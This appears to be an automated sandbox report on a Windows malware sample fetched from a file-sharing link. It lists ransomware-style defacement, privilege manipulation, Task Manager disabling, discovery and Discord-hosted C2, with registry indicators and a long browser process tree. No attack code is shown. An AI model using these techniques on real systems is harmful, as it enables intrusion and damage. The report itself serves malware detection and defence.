hxxps://gofile[.]io/d/QzrdeO

Analysis

max time kernel
149s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
02-01-2025 16:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/QzrdeO

Score

9^/10

paypal defense_evasion discovery evasion phishing ransomware

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
4960	cmd.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	Lose2himatoV2.exe

Executes dropped EXE 1 IoCs

pid	Process
5740	Lose2himatoV2.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
81	discord.com
82	discord.com

Detected potential entity reuse from brand PAYPAL.
phishing paypal

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\WINDOWS\SYSTEM32\WINBIODATABASE\51F39552-1075-4199-B513-0C10EA185DB0.DAT	svchost.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\MySingleFileApp\\wallpaper.bmp"	Lose2himatoV2.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 29 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shutdown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Lose2himatoV2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "194"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2437139445-1151884604-3026847218-1000\{6CD0466E-8846-4F9A-903A-1F38552EAA18}	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 190314.crdownload:SmartScreen	msedge.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
1408	msedge.exe
1408	msedge.exe
2688	msedge.exe
2688	msedge.exe
1364	identity_helper.exe
1364	identity_helper.exe
5400	msedge.exe
5400	msedge.exe
2464	msedge.exe
2464	msedge.exe
5304	msedge.exe
5304	msedge.exe
5304	msedge.exe
5304	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs

pid	Process
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3504	shutdown.exe
Token: SeRemoteShutdownPrivilege	3504	shutdown.exe
Token: SeShutdownPrivilege	868	svchost.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe
2688	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3924	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2688 wrote to memory of 1184	2688	msedge.exe	84
PID 2688 wrote to memory of 1184	2688	msedge.exe	84
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 2772	2688	msedge.exe	85
PID 2688 wrote to memory of 1408	2688	msedge.exe	86
PID 2688 wrote to memory of 1408	2688	msedge.exe	86
PID 2688 wrote to memory of 1244	2688	msedge.exe	87
PID 2688 wrote to memory of 1244	2688	msedge.exe	87
PID 2688 wrote to memory of 1244	2688	msedge.exe	87
PID 2688 wrote to memory of 1244	2688	msedge.exe	87
PID 2688 wrote to memory of 1244	2688	msedge.exe	87
PID 2688 wrote to memory of 1244	2688	msedge.exe	87
PID 2688 wrote to memory of 1244	2688	msedge.exe	87
PID 2688 wrote to memory of 1244	2688	msedge.exe	87
PID 2688 wrote to memory of 1244	2688	msedge.exe	87
PID 2688 wrote to memory of 1244	2688	msedge.exe	87
PID 2688 wrote to memory of 1244	2688	msedge.exe	87
PID 2688 wrote to memory of 1244	2688	msedge.exe	87
PID 2688 wrote to memory of 1244	2688	msedge.exe	87
PID 2688 wrote to memory of 1244	2688	msedge.exe	87
PID 2688 wrote to memory of 1244	2688	msedge.exe	87
PID 2688 wrote to memory of 1244	2688	msedge.exe	87
PID 2688 wrote to memory of 1244	2688	msedge.exe	87
PID 2688 wrote to memory of 1244	2688	msedge.exe	87
PID 2688 wrote to memory of 1244	2688	msedge.exe	87
PID 2688 wrote to memory of 1244	2688	msedge.exe	87

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/QzrdeO
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xe0,0xd8,0x104,0xdc,0x108,0x7ffe25bf46f8,0x7ffe25bf4708,0x7ffe25bf4718
  2⤵
  PID:1184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
  2⤵
  PID:2772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:8
  2⤵
  PID:1244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
  2⤵
  PID:3124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
  2⤵
  PID:4536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1
  2⤵
  PID:1248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
  2⤵
  PID:704
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 /prefetch:8
  2⤵
  PID:2852
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3984 /prefetch:1
  2⤵
  PID:4992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3504 /prefetch:8
  2⤵
  PID:428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
  2⤵
  PID:1956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6032 /prefetch:8
  2⤵
  PID:1572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6148 /prefetch:1
  2⤵
  PID:2228
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:1
  2⤵
  PID:1448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
  2⤵
  PID:568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:1
  2⤵
  PID:4376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6296 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:1
  2⤵
  PID:3720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:1
  2⤵
  PID:5564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
  2⤵
  PID:2560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6856 /prefetch:1
  2⤵
  PID:4704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:1
  2⤵
  PID:5996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
  2⤵
  PID:5880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6860 /prefetch:8
  2⤵
  PID:4492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6640 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:2464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
  2⤵
  PID:3524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2760 /prefetch:1
  2⤵
  PID:4084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,1032102084299866071,9195496179577762557,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6204 /prefetch:1
  2⤵
